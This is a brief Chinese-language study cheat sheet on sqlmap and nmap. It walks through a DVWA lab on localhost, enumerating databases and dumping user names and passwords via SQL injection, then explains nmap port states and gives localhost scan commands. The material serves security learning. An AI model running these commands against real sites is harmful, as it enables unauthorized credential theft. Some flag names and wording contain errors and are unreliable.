Nmap、Sqlmap等工具使用

Sqlmap

-u 指定注入點url
-r 指定request？
--dbs 暴庫
--tables 列出表
--columns 列出字段
--dump 下載數據
--beach 程序自動輸入詢問語句的[Y/N]
--current-db web當前使用的數據庫
--start 指定開始行
--stop 指定結束行
--cookie 添加cookie
-D -T -C 指定數據庫、表、字段

以dvwa中sql注入爲例(url='http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit#')
1.sqlmap -u 'url' --dbs
2.sqlmap -u 'url' -D dvwa --tables
3.sqlmap -u 'url' -D dvwa -T users --columns
4.sqlmap -u 'url' -D dvwa -T users -C "first_name,password" --dump

還能夠利用抓包工具將request請求保存爲txt文檔，而後經過-r參數傳遞(request.txt爲抓包保存的txt文件)
1.sqlmap -r request.txt --dbs
2.sqlmap -r request.txt -D dvwa --tables
3.sqlmap -r request.txt -D dvwa -T users --columns
4.sqlmap -r request.txt -D dvwa -T users -C 'first_name,password' --dump

Nmap

狀態描述：
open:應用程序在該端口接收 TCP 鏈接或者 UDP 報文。
closed:關閉的端口對於nmap也是可訪問的， 它接收nmap探測報文並做出響應。但沒有應用程序在其上監聽。
filtered:因爲包過濾阻止探測報文到達端口，nmap沒法肯定該端口是否開放。過濾可能來自專業的防火牆設備，路由規則 或者主機上的軟件防火牆。
unfiltered:未被過濾狀態意味着端口可訪問，可是nmap沒法肯定它是開放仍是關閉。 只有用於映射防火牆規則集的 ACK 掃描纔會把端口分類到這個狀態。
open|filtered:沒法肯定端口是開放仍是被過濾， 開放的端口不響應就是一個例子。沒有響應也可能意味着報文過濾器丟棄了探測報文或者它引起的任何反應。UDP，IP協議,FIN, Null 等掃描會引發。
closed|filtered:（關閉或者被過濾的）：沒法肯定端口是關閉的仍是被過濾的

nmap 127.0.0.1
nmap 127.0.0.1 -p 1-65535
使用-p參數指定端口範圍。若是不加-p指定端口範圍，會掃描一些默認的、著名的、已知協議的端口，會漏掉未知服務端口